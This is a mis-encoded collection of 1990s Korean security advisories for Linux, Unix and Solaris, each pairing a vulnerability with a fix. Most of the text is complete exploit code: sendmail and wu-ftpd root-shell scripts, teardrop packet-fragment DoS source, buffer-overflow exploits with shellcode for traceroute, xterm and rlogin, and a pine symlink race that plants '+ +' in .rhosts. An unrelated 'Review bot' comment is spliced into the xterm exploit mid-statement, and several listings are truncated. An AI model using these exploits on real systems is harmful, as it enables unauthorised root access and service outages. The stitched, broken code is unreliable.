¹®Á¦°¡ ÀÖ´Ù. syslog floodingÀÌ °¡´ÉÇϸç.. ¿À¹öÇ÷ο츦 ÀÏÀ¸Å³¼ö ÀÖ´Â º¸¾È»ó ¹®Á¦Á¡ÀÌ ¹ß°ßµÇ¾ú´Ù. #include main() { sysctl(NULL, 0x80000000, NULL, NULL, NULL, 0); /* 0x80000000 can be replaced with 0xC0000000 -- both are negative, * and * produce a zero when multiplied by sizeof(int) */ } ÀÌ¿Í °°Àº ¹®Á¦Á¡Àº getgroups()¶ó´Â ÇÔ¼ö¿¡¼­µµ ¸¶Âù°¡Áö´Ù. ÇØ°á ¹Ýµå½Ã 2.0.31 ÀÎ »ç¶÷¸¸ °íÃĶó. /usr/src/linux/kernel.sysctl.c ÀÇ ÆÄÀϾȿ¡ struct ctl_table_header *tmp; void *context; if (nlen == 0 || nlen >= CTL_MAXNAME) <= ÀÌ°ÍÀ» if (nlen <= 0 || nlen >= CTL_MAXNAME) <= ÀÌ·¸°Ô °íÃĶó. return -ENOTDIR; error = verify_area(VERIFY_READ,name,nlen*sizeof(int)); ±×¸®°í ´Ù½Ã ÄÄÆÄÀÏ ½ÃÄѶó. Ä¿³Î ÄÄÆÄÀÏ. 
--------------------------- Á¦ ¸ñ: [º¸¾È] ¸®´ª½º&À¯´Ð½º sendmail (1) ¸í·É sendmail( 8.7 ~ 8.8.2) ¿µÇâÀÖ´Â ½Ã½ºÅÛ ¼¾µå ¸ÞÀÏÀ» žÀçÇÑ ¸ðµç À¯´Ð½º ¹®Á¦Á¡ ´ÙÀ½°ú °°Àº °£´ÜÇÑ ½ºÅ©¸³Æ®·Î ·çÆ®¸¦ ȹµæÇÒ¼ö ÀÖ´Ù. #/bin/sh # # # Hi ! # This is exploit for sendmail smtpd bug # (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms). # This shell script does a root shell in /tmp directory. # If you have any problems with it, drop me a letter. # Have fun ! # # # ---------------------- # --------------------------------------------- # ----------------- Dedicated to my beautiful lady ------------------ # --------------------------------------------- # ---------------------- # # Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su # # # echo 'main() '>>leshka.c echo '{ '>>leshka.c echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c echo '} '>>leshka.c # # echo 'main() '>>smtpd.c echo '{ '>>smtpd.c echo ' setuid(0); setgid(0); '>>smtpd.c echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c echo '} '>>smtpd.c # # cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c ./leshka kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n "|head -n 1` rm leshka.c leshka smtpd.c /tmp/smtpd /tmp/sh ÇØ°áÃ¥ ³ôÀº ¹öÁ¯ÀÇ ¼¾µå¸ÞÀÏÀ» ¼³Ä¡ÇÏ´Â ±æ ¹Û¿¡ ¾ø´Ù. --------------------------- Á¦ ¸ñ: [º¸¾È] ¸®´ª½º&À¯´Ð½º wu-FTP ¸í·É wu-FTP ( site exec ) ¿µÇâÀÖ´Â ½Ã½ºÅÛ wu-ftp2.x ¸¦ ±òÀº ¸ðµç À¯´Ð½º ¹öÁ¯ ¹®Á¦Á¡ site exec ÀÇ Å« ¹ö±×·Î ·çÆ® ±ÇÇÑÀ¸·Î µ¹¾Æ°¡´Â ftpÀÇ À߸øµÈ ¿À·ù·Î ·çÆ®±ÇÇÑÀ¸·Î È£½ºÆ®ÀÇ ÇÁ·Î±×·¥À» ½ÇÇà½Ãų¼ö°¡ ÀÖ´Ù. cat > bug.c #include #include #include main() { seteuid(0); system("cp /bin/sh /tmp/.sh"); system("chmod 6777 /tmp/.sh"); } À§ÀÇ ¼Ò½º¸¦ cc -o bug bug.c ·Î ÄÄÆÄÀÏ ÈÄ¿¡ ftp ·Î ÀÚ½ÅÀÇ È£½ºÆ®¿¡ Á¢¼Ó ÇÑ´Ù. ±× ¿¹ÀÌ´Ù. ftp 0 220 exploitablesys FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994) r eady. Name (0:guest): guest 331 Password required for guest. Password: (password) 230 User guest logged in. Remote system type is UNIX. 
Using binary mode to transfer files. ftp> quote "site exec bash -c id" (see if sys is exploitable) 200-bash -c id 200-uid=0(root) gid=0(root) euid=505(adm) egid=100(users) groups=100(users) 200 (end of 'bash -c id') ftp> quote "site exec bash -c /home/guest/bug" 200-bash -c /home/guest/bug 200 (end of 'bash -c /home/guest/bug') ftp> quit À§¿Í °°ÀÌ Çϸé bug¶ó´Â ÇÁ·Î±×·¥ÀÌ ·çÆ® ±ÇÇÑÀ¸·Î µ¹¾Æ°¡°Ô µÈ´Ù. ±×·¸°Ô µÇ¸é /tmp µð·ºÅ丮¿¡ ·çÆ®±ÇÇÑÀÇ ½©ÀÌ ¸¸µé¾îÁø´Ù. ÇØ°á ftp ¹öÁ¯À» ÃÖ½ÅÀ¸·Î ¸ÂÃß¾î¶ó. 2.4.2¹öÁ¯ÀÌ¸é ¹«³­ÇÏ´Ù. ¶ÇÇÑ ÀǽÉÇÏ´Â ¾ÆÀ̵ð´Â site ¸í·ÉÀ» »ç¿ëÇÏÁö ¸øÇÏ°Ô Á¦ÇÑÀ» µÎ¾î¶ó --------------------------- Á¦ ¸ñ: [º¸¾È] ¸®´ª½º&À¯´Ð½º sendmail (2) ¸í·É sendmail 8.8.4 ½Ã½ºÅÛ ¼¾µå¸ÞÀÏ 8.8.4¸¦ ¿î¿µÇÏ´Â ¸ðµç ½Ã½ºÅÛ ¹®Á¦Á¡ ¼¾µå ¸ÞÀÏÀÇ À߸øµÈ ¹ö±×·Î ÀÎÇØ /var/tmp¿¡ dead.letterÀ̶ó´Â ÆÄÀÏÀ» ¸¸µå´Âµ¥ ÀÌ´Â ·çÆ®ÀÇ ±ÇÇÑÀÌ´Ù. ±× ¿¹ ln -s /.rhosts /var/tmp/dead.letter telnet white.hacker.securi.ty 25 mail from : security@wh.it.e.best rcpt to : Fuck@fuck.you.haha data dlfjs qjrmrk dlTska.. . quit ÀÌ·¸°Ô ÇÔÀ¸·Î½á ·çÆ® µð·ºÅ丮¿¡ .rhosts ÆÄÀÏÀ» ¸¸µé¼ö ÀÖ´Ù. À̸¦ Á»´õ ÀÀ¿ëÇϸé Æнº¿öµå ÆÄÀÏÀ» ¼Õº¼¼ö ÀÖ´Ù. ÇØ°áÃ¥ ¼¾µå¸ÞÀÏ À» 8.8.5 ÀÌ»óÀ¸·Î ¿Ã·Á¶ó. --------------------------- Á¦ ¸ñ: [º¸¾È] ¸®´ª½º Lizards game ¸í·É Lizards game ½Ã½ºÅÛ ½½·¢¿þ¾î 3.4 ¹®Á¦Á¡ Lizards °ÔÀÓÀº setuid°¡ °É·ÁÀÖ´Â ÇÁ·Î±×·¥ÀÌ´Ù. setuid °¡ °É·Á ÀÖ´Â ÀÌÀ¯´Â ¹Ù·Î ÀÌ °ÔÀÓÀÌ svgalib¸¦ »ç¿ëÇϱ⠶§¹®ÀÌ´Ù. ±×·±µ¥ ±× °ÔÀÓÀÇ ¼Ò½º¸¦ º¸¸é system(clear);¶ó°í ÇÔ¼ö¸¦ »ç¿ëÇß´Ù. ÀÌ´Â »ç¿ëÀÚÀÇ ÀÔÀåÀ¸·Î º¸¸é °£´ÜÈ÷ ±¸¸ÛÀ» ¹ß°ßÇÒ ¼ö ÀÖ´Ù. path=. ¶ó°í µÎ°í clear ½ºÅ©¸³Æ®¸¦ ÀÛ¼ºÇÏ¿© ±× clear½ºÅ©¸³Æ®¸¦ ·çÆ®ÀÇ ±ÇÇÑÀ¸·Î µ¹¸±¼ö ÀÖ´Ù. ÇØ°áÃ¥ ¿ì¼± ±× ÆÄÀÏÀÇ Æ۹̼ÇÀ» ´Ý¾ÆµÎ¾î¶ó. chmod -s /usr/games/lizardlib/lizardshi --------------------------- Á¦ ¸ñ: [º¸¾È] ¸®´ª½º IP fragment overlap ¸í·É IP fragment overlap ½Ã½ºÅÛ ¸®´ª½º / À©µµ¿ì NT / À©µµ¿ì 95 / ±âŸ À¯´Ð½º ½Ã½ºÅÛ ¹®Á¦Á¡ ¾Æ·¡ÀÇ ÇÁ·Î±×·¥À» µ¹·Á¼­ ½Ã½ºÅÛÀ» ¸ØÃß°Ô ÇÒ ¼ö ÀÖ´Ù. 
/* * Copyright (c) 1997 route|daemon9 * 11.3.97 * * Linux/NT/95 Overlap frag bug exploit * * Exploits the overlapping IP fragment bug present in all Linux * kernels and NT 4.0 / Windows 95 (others?) * * Based off of: flip.c by klepto * Compiles on: Linux, *BSD* * * gcc -O2 teardrop.c -o teardrop * OR * gcc -O2 teardrop.c -o teardrop -DSTRANGE_BSD_BYTE_ORDERING_THING */ #include #include #include #include #include #include #include #include #include #include #include #ifdef STRANGE_BSD_BYTE_ORDERING_THING /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */ #define FIX(n) (n) #else /* OpenBSD 2.1, all Linux */ #define FIX(n) htons(n) #endif /* STRANGE_BSD_BYTE_ORDERING_THING */ #define IP_MF 0x2000 /* More IP fragment en route */ #define IPH 0x14 /* IP header size */ #define UDPH 0x8 /* UDP header size */ #define PADDING 0x1c /* datagram frame padding for first packet */ #define MAGIC 0x3 /* Magic Fragment Constant (tm). Should be 2 or 3 * / #define COUNT 0x1 /* Linux dies with 1, NT is more stalwart and can * withstand maybe 5 or 10 sometimes... Experiment. 
*/ void usage(u_char *); u_long name_resolve(u_char *); u_short in_cksum(u_short *, int); void send_frags(int, u_long, u_long, u_short, u_short); int main(int argc, char **argv) { int one = 1, count = 0, i, rip_sock; u_long src_ip = 0, dst_ip = 0; u_short src_prt = 0, dst_prt = 0; struct in_addr addr; fprintf(stderr, "teardrop route|daemon9\n\n"); if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("raw socket"); exit(1); } if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(on e)) < 0) { perror("IP_HDRINCL"); exit(1); } if (argc < 3) usage(argv[0]); if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2] ))) { fprintf(stderr, "What the hell kind of IP address is that?\n"); exit(1); } while ((i = getopt(argc, argv, "s:t:n:")) != EOF) { switch (i) { case 's': /* source port (should be emphemeral) */ src_prt = (u_short)atoi(optarg); break; case 't': /* dest port (DNS, anyone?) */ dst_prt = (u_short)atoi(optarg); break; case 'n': /* number to send */ count = atoi(optarg); break; default : usage(argv[0]); break; /* NOTREACHED */ } } srandom((unsigned)(time((time_t)0))); if (!src_prt) src_prt = (random() % 0xffff); if (!dst_prt) dst_prt = (random() % 0xffff); if (!count) count = COUNT; fprintf(stderr, "Death on flaxen wings:\n"); addr.s_addr = src_ip; fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt); addr.s_addr = dst_ip; fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt); fprintf(stderr, " Amt: %5d\n", count); fprintf(stderr, "[ "); for (i = 0; i < count; i++) { send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt); fprintf(stderr, "b00m "); usleep(500); } fprintf(stderr, "]\n"); return (0); } /* * Send two IP fragments with pathological offsets. We use an implementati on * independent way of assembling network packets that does not rely on any of * the diverse O/S specific nomenclature hinderances (well, linux vs. BSD). 
*/ void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt, u_short dst_prt) { u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */ u_char byte; /* a byte */ struct sockaddr_in sin; /* socket protocol structure */ sin.sin_family = AF_INET; sin.sin_port = src_prt; sin.sin_addr.s_addr = dst_ip; /* * Grab some memory for our packet, align p_ptr to point at the beginnin g * of our packet, and then fill it with zeros. */ packet = (u_char *)malloc(IPH + UDPH + PADDING); p_ptr = packet; bzero((u_char *)p_ptr, IPH + UDPH + PADDING); byte = 0x45; /* IP version and header length */ memcpy(p_ptr, &byte, sizeof(u_char)); p_ptr += 2; /* IP TOS (skipped) */ *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING); /* total length */ p_ptr += 2; *((u_short *)p_ptr) = htons(242); /* IP id */ p_ptr += 2; *((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */ p_ptr += 2; *((u_short *)p_ptr) = 0x40; /* IP TTL */ byte = IPPROTO_UDP; memcpy(p_ptr + 1, &byte, sizeof(u_char)); p_ptr += 4; /* IP checksum filled in by kernel * / *((u_long *)p_ptr) = src_ip; /* IP source address */ p_ptr += 4; *((u_long *)p_ptr) = dst_ip; /* IP destination address */ p_ptr += 4; *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ p_ptr += 2; *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ p_ptr += 2; *((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */ if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&si n, sizeof(struct sockaddr)) == -1) { perror("\nsendto"); free(packet); exit(1); } /* We set the fragment offset to be inside of the previous packet's * payload (it overlaps inside the previous packet) but do not include * enough payload to cover complete the datagram. Just the header will * do, but to crash NT/95 machines, a bit larger of packet seems to wor k * better. 
*/ p_ptr = &packet[2]; /* IP total length is 2 bytes into the heade r */ *((u_short *)p_ptr) = FIX(IPH + MAGIC + 1); p_ptr += 4; /* IP offset is 6 bytes into the header */ *((u_short *)p_ptr) = FIX(MAGIC); if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin, void usage(u_char *name) { fprintf(stderr, "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\ n", name); exit(0); } ÇØ°áÃ¥ Ä¿³ÎÀ» 2.0.32-pre4 ·Î ¾÷Çضó. or ¼Ò½º¸¦ ´ÙÀ½°ú °°ÀÌ ¹Ù²ã¼­ ´Ù½Ã ÄÄÆÄÀÏ ½ÃÄѶó --- ip_fragment.c Mon Nov 10 14:58:38 1997 +++ ip_fragment.c.patched Mon Nov 10 19:18:52 1997 @@ -12,6 +12,7 @@ * Alan Cox : Split from ip.c , see ip_input.c for history. * Alan Cox : Handling oversized frames * Uriel Maimon : Accounting errors in two fringe case s. + * route : IP fragment overlap bug */ #include 
@@ -578,6 +579,22 @@ frag_kfree_s(tmp, sizeof(struct ipfrag)); } } + + /* + * Uh-oh. Some one's playing some park shenanigans on us. + * IP fragoverlap-linux-go-b00m bug. + * route 11.3.97 + */ + + if (offset > end) + { + skb->sk = NULL; + printk("IP: Invalid IP fragment (offset > end) found from % s\n", in_ntoa(iph->saddr)); + kfree_skb(skb, FREE_READ); + ip_statistics.IpReasmFails++; + ip_free(qp); + return NULL; + } /* * Insert this fragment in the chain of fragments. --------------------------- Á¦ ¸ñ: [º¸¾È] ¸®´ª½º pppd chatscript ¸í·É µ¥ºñ¾È pppd chatscript ½Ã½ºÅÛ µ¥ºñ¾È ¸®´ª½º ¹®Á¦Á¡ /var/log/ppp.log ÆÄÀÏÀ» ´©±¸³ª ´Ù ÀÐÀ»¼ö ÀÖ°Ô Çسõ¾Ò´Ù. $> more /var/log/ppp.log ¾î¼±¸ Àú¼±¸. Dec 14 16:43:14 gateway chat[362]: ^Mlogin -- got it Dec 14 16:43:14 gateway chat[362]: send (loginname^M) Dec 14 16:43:15 gateway chat[362]: expect (word) Dec 14 16:43:15 gateway chat[362]: : loginname^M Dec 14 16:43:15 gateway chat[362]: Password -- got it Dec 14 16:43:15 gateway chat[362]: send (³ªÀÇÆнº¿öµå^M) ÀÌ·± Çü½ÄÀ¸·Î ³»¿ëÀ» º¸¸é Æнº¿öµå°¡(^^;) º¸ÀδÙ. ÇØ°áÃ¥ ÆÐÄ¡µÈ ¹öÁ¯ÀÌ ¾ø´Â°Í °°´Ù. ^^; Áö±ÝÀº ³ª¿ÔÀ» °ÍÀÌ´Ù. ¹öÁ¯À» ¿Ã·Á¶ó --------------------------- Á¦ ¸ñ: [º¸¾È] ¸®´ª½º X ¼­¹ö ¸í·É X¼­¹ö- XFree 3.3.1 3.2.9 3.1.2 ÀÇ XF86_½Ã¸®Áî ½Ã½ºÅÛ ¿¢½º¼­¹ö¸¦ ¾´´À ¸ðµç À¯´Ð½º¹× ¸®´ª½º ¹®Á¦Á¡ ´ÙÀ½°ú °°Àº Æí¹ýÀ¸·Î ùÁÙÀÇ ÆÄÀÏÀ» º¼¼ö°¡ ÀÖ´Ù. $ ls -al /etc/shadow -rw------- 1 root bin 1039 Aug 21 20:12 /etc/shadow $ id uid=502(loveyou) gid=500(users) groups=500(users) $ cd /usr/X11R6/bin $ ./XF86_SVGA -config /etc/shadow Unrecognized option: root:qEXaUxSeQ45ls:10171:-1:-1:-1:-1:-1:-1 use: X [:] [option] -a # mouse acceleration (pixels) -ac disable access control restrictions -audit int set audit trail level -auth file select authorization file bc enable bug compatibility -bs disable any backing store support -c turns off key-click ÀÌ·± Çü½ÄÀÌ´Ù.. ÇØ°áÃ¥ Setuid ¸¦ ¾ø¾Ö´øÁö ƯÁ¤ ÀÌ¿ëÀÚ¸¸ ¾²µµ·Ï Çã¶ôÇضó. 
--------------------------- Á¦ ¸ñ: [º¸¾È] ¸®´ª½º ·¡µåÇÞ 5.0 À¯Æ¿¸®Æ¼ ¸í·É /bin/ping, /usr/sbin/traceroute, /usr/bin/rlogin, /usr/bin/rsh (actually glibc2 is guilty one) ½Ã½ºÅÛ ·¡µåÇÞ 5.0 ¹®Á¦Á¡ ¹öÆÛ ¿À¹ö·±À» ÀÌ¿ëÇؼ­ ·çÆ®¸¦ ¾ò´Â´Ù. /* Just Your Standard EGGSHELL Proggie: traceroute buffer overflow exploit for RedHat Linux 5.0 mostly ripped from Aleph One Wilton Wong wwong@blackstar.net gcc -o trace_shell trace_shell.c */ #include #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 1019 #define DEFAULT_EGG_SIZE 2048 #define NOP 0x90 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr, *egg; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i, eggsize=DEFAULT_EGG_SIZE; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (argc > 3) eggsize = atoi(argv[3]); if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } if (!(egg = malloc(eggsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_sp() - offset; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; ptr = egg; for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) *(ptr++) = NOP; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; egg[eggsize - 1] = '\0'; memcpy(egg,"EGG=",4); putenv(egg); memcpy(buff,"RET=",4); putenv(buff); printf("Now run: /usr/sbin/traceroute $RET\n"); system("/bin/bash"); } ÇØ°áÃ¥ ÆÐÄ¡ ¹æ¹ý $ diff -u /dbase/glibc-2.0.6pre4/resolv/res_query.c /usr/glibc/src/libc/resolv/ --- /dbase/glibc-2.0.6pre4/resolv/res_query.c Mon Jan 6 23:05:43 1997 +++ /usr/glibc/src/libc/resolv/res_query.c Mon Dec 8 09:05:53 1997 
@@ -321,7 +321,7 @@ u_char *answer; /* buffer to put answer */ int anslen; /* size of answer */ { - char nbuf[MAXDNAME]; + char nbuf[MAXDNAME * 2 + 2]; /*À̺κÐÀ» À§¿Í ¹Ù²Ù¸é µÈ´Ù.*/ const char *longname = nbuf; int n; --------------------------- Á¦ ¸ñ: [º¸¾È] ¸®´ª½º crontab ¸í·É dillon crontab / crond ( dcron 2.2 ) ½Ã½ºÅÛ ½½·º¿þ¾î 3.4 ¹®Á¦Á¡ ¹öÆÛ ¿À¹ö Ç÷ο츦 ÀÌ¿ëÇؼ­ ·çÆ®¸¦ ¾òÀ»¼ö ÀÖ´Ù. ÀáÀçÀûÀÎ ¹öÆÛ ¿À¹ö Ç÷οìÀÇ °¡´É¼ºÀÌ º¸ÀδÙ. ÇØ°áÃ¥ ´ÙÀ½ÀÇ »çÀÌÆ®¿¡¼­ ÆÐÄ¡ ¹öÁ¯À» ¹Þ´Â´Ù. ftp://ftp.cdrom.com/pub/linux/slackware-3.4/slakware/a2/bin.tgz ftp://ftp.cdrom.com/pub/linux/slackware-3.4/source/a/bin/dcron22.tar.gz ftp://ftp.cdrom.com/pub/linux/slackware-3.4/source/a/bin/dcron22.diff.gz --------------------------- Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º xterm ¸í·É xterm ½Ã½ºÅÛ ¼Ö¶ó¸®½º 2.5.1(SunOS 5.5.1) ¹®Á¦Á¡ ¹öÆÛ ¿À¹ö Ç÷ο츦 ÀÏÀ¸ÄÑ º¸¾È»ó ÇêÁ¡À» ¸¸µé¼ö ÀÖ´Ù. ±× ¿¹Á¦ÀÌ´Ù. /* * X11R6.3 xterm exploit for solaris 2.5.1 by DCRH 28/5/97 * */ #include #include #include #include #define EXTRA2 1300 #define BUF_LENGTH 400 #define EXTRA 500 /* Need an addr such that contents of addr+0xe98 = 0 */ #define SAFE_ADDR ((unsigned)0xefff2008) #define STACK_OFFSET 0x4800 #define SPARC_NOP 0xa61cc013 u_long sparc_shellcode[] = { "½©ÄÚµå" }; u_long get_sp(void) { asm("mov %sp,%i0 \n"); } char buf[BUF_LENGTH + EXTRA + EXTRA2 + 8]; char longvar[0x4000] = "BLAH="; void main(int argc, char *argv[]) { char *env[2]; unsigned long targ_addr; u_long *long_p; int i, code_length = sizeof(sparc_shellcode),dso=0; if(argc > 1) dso=atoi(argv[1]); long_p =(u_long *) buf; for (i = 0; i < EXTRA2 / sizeof(u_long); i++) *long_p++ = (SAFE_ADDR >> 8) | (SAFE_ADDR << 24); targ_addr = get_sp() - STACK_OFFSET - dso; for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++) *long_p++ = SPARC_NOP; for (i = 0; i < code_length / sizeof(u_long); i++) *long_p++ = sparc_shellcode[i]; for (i = 0; i < EXTRA / sizeof(u_long); i++) *long_p++ = targ_addr; printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n", 
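Review bot: Enlarging nbuf to `MAXDNAME * 2 + 2` removes the overflow only if the code that composes the name into nbuf (below this hunk, in the same function) bounds each of the two components to MAXDNAME; if either is copied unbounded, a larger buffer merely moves the boundary. A length check against `sizeof nbuf` before the copy, failing with EMSGSIZE when the combined length plus the separator does not fit, would make the fix independent of the buffer's size. The inline comment on the new line describes the edit rather than the reason; `/* room for name + '.' + domain, each at most MAXDNAME */` would document the sizing. The enclosing function's body continues outside the hunk.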
targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET); /* This is just to shove the stack down a bit */ memset(&longvar[5], 'a', sizeof longvar-6); longvar[sizeof longvar -1] = '\0'; env[0] = longvar; env[1] = NULL; execle("./xterm", "xterm", "-xrm", buf,(char *) 0, env); perror("execl failed"); } ÇØ°áÃ¥ ´ÙÀ½ÀÇ »çÀÌÆ®¿¡¼­ ¿ÍÆÛ¸¦ ±¸Çشٰ¡ ¼³Ä¡Ç϶ó. ftp://ftp.auscert.org.au/pub/auscert/tools/overflow_wrapper /overflow_wrapper.c or http://cegt201.bradley.edu/~im14u2c/wrapper/ --------------------------- Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º ff.core ¸í·É /usr/openwin/bin/ff.core ½Ã½ºÅÛ ¼Ö¶ó¸®½º 2.4 ¹®Á¦Á¡ IFS=/À» ÀÌ¿ëÇؼ­ /usr/??ÇÁ·Î±×·¥À» µ¹¸®·Á´Â ff.core ÆÄÀÏÀÇ º»·¡ ÃëÁö¸¦ ¹þ¾î³ª usr ÇÁ·Î±×·¥À» µ¹¸®°í ±× µÚÀÇ °ÍµéÀº Àμö·Î½á ÀÛ¿ëÇÏ°Ô ¸¸µç´Ù. ´ÙÀ½Àº ±× ¿¹Á¦ÀÌ´Ù. % ksh % cd /tmp % cp /bin/ksh . % echo "chown root ksh; chmod u+s ksh" > usr % chmod +x usr % export IFS=/ % ÇÑÁÙÀÇ ¾î¶² ¸í·É .. % ./ksh # ÇØ°áÃ¥ ÆÐÄ¡Çضó. --------------------------- Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º gethostbyname() ¸í·É gethostbyname() ½Ã½ºÅÛ ¼Ö¶ó¸®½º 2.5 2.5.1 ¹®Á¦Á¡ ¹öÆÛ ¿À¹ö Ç÷ο츦 ÀÏÀ¸ÄѼ­ ½©À» ½ÇÇà½ÃŲ´Ù..·çÆ® ¼ÒÀ¯·Î. ±× ¿¹Á¦ÀÌ´Ù. /* * rlogin-exploit.c: gets a root shell on most Solaris 2.5/2.5.1 machines * by exploiting the gethostbyname() overflow in rlogin. * * gcc -o rlogin-exploit rlogin-exploit.c * * Jeremy Elson, 18 Nov 1996 * jeremy.elson@nih.gov */ #include #include #include #include #define BUF_LENGTH 8200 #define EXTRA 100 #define STACK_OFFSET 4000 #define SPARC_NOP 0xa61cc013 u_char sparc_shellcode[] ="½©ÄÚµå"; u_long get_sp(void) { __asm__("mov %sp,%i0 \n"); } void main(int argc, char *argv[]) { char buf[BUF_LENGTH + EXTRA]; long targ_addr; u_long *long_p; u_char *char_p; int i, code_length = strlen(sparc_shellcode); long_p = (u_long *) buf; for (i = 0; i<(BUF_LENGTH - code_length) / sizeof(u_long); i++) *long_p++ = SPARC_NOP; char_p = (u_char *) long_p; for (i = 0; i out & (and go to sleep). # # version 3.91, 3.92 ..... # version 3.95 fixed # # Note: must do some changes in the script. 
look 4 CHANGE THIS: # # Yea i know is a lame script but is better than nothing.. # try to exploit the bug without a script and you will wait # forever. # e-torres@uniandes.edu.co # argumentos=0 if [ $# -eq $argumentos ] then echo "Usage: $0 username path/file_to_create & " echo "ET Lownoise 1996 Colombia" exit fi username=$1 archivo=$2 #CHANGE THIS: #text='text to puit in file to create' #usr=path of the program users #pineprog=how the pine program appears when u do a w (who) command text='+ +' usr=users pineprog=pine # date echo "- Looking for $1 to log in... just wait" # entrada=0 entro=0 until [ $entro -eq $entrada ] do for nombre in `$usr` do if [ $nombre = $1 ] then entro=1 fi done done date echo "- Ok $username is logged now." # echo "- Lets wait that $1 run pine. " noejecuto=0 ejecuto=0 until [ $ejecuto -ne $noejecuto ] do for ejecutando in `w $username` do if [ $ejecutando = $pineprog ] then date echo '- OK ' $1 ' is running ' $pineprog '.' ejecuto=1 fi done done echo "- Now lets grab the lock file of $username from /tmp" ls -al /tmp | grep $username > temp1 cat temp1 | grep rw-rw-rw- > temporal lockfile=`awk '{print $9}' temporal` rm temp1 rm temporal echo "> Username $username" echo "> Lockfile $lockfile" echo echo "- OK now im going to wait that $username " echo " quits $pineprog " # do it till exist lockfile, that means username havent quit pine cd /tmp while [ -s $lockfile ] do sleep 0 done cd date echo "- OK $username quit $pineprog .. now to link $lockfile " #$archivo is the complete path of file in username cd /tmp (ÇÑÁÙÀÇ °úÁ¤) cho "- $lockfile is now linked " cd echo "- $username must now return to pine to create" echo " $archivo " echo "- Waiting $username to return pine " noejecuto=0 ejecuto=0 until [ $ejecuto -ne $noejecuto ] do for ejecutando in `w $username ` do if [ $ejecutando = $pineprog ] then date echo '- OK ' $username ' is running ' $pineprog ejecuto=1 fi done done echo "- Introducing text..." 
cd /tmp echo $text > $lockfile echo "- Erasing $lockfile " rm $lockfile cd echo "THE END DUDE!" echo "ET Lownoise 1996 " ÇØ°áÃ¥ PineÀÇ ¹öÁ¯À» 3.95ÀÌ»óÀ¸·Î ¹Ù²Ù¾î¶ó. --------------------------- Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º sendmail ¸í·É sendmail ( 8.7.x ~ 8.8.2?) ½Ã½ºÅÛ ¼Ö¶ó¸®½º 2.5 2.5.1 ¹®Á¦Á¡ ¼¾µå ¸ÞÀÏ»óÀÇ ¹ö±×·Î ·çÆ®½©À» »ý¼ºÇÒ ¼ö ÀÖ´Ù. ´ÙÀ½Àº ±× ¿¹Á¦ÀÌ´Ù. #/bin/sh # # Modify RUN in x.c for what you wanna run, and possibly the # location or format of the ps command in the KILL line below for # your platform. # # Or you could remove x.c alltogether and just put what you wanna # do as root in smtpd.c (Ie: 'echo "+ +" >>/.rhosts' works nicely) # # cat << _EOF_ >/tmp/x.c #define RUN "/bin/ksh" #include main() { execl(RUN,RUN,NULL); } _EOF_ # cat << _EOF_ >/tmp/spawnfish.c main() { (ÀÏ·ÃÀÇ °úÁ¤ ..) } _EOF_ # cat << _EOF_ >/tmp/smtpd.c main() { setuid(0); setgid(0); system("chown root /tmp/x ;chmod 4755 /tmp/x"); } _EOF_ # # gcc -O -o /tmp/x /tmp/x.c gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c gcc -O3 -o /tmp/smtpd /tmp/smtpd.c # /tmp/spawnfish kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1` rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c sleep 5 if [ -u /tmp/x ] ; then echo "leet..." /tmp/x fi ÇØ°áÃ¥ ¼¾µå¸ÞÀÏÀÇ 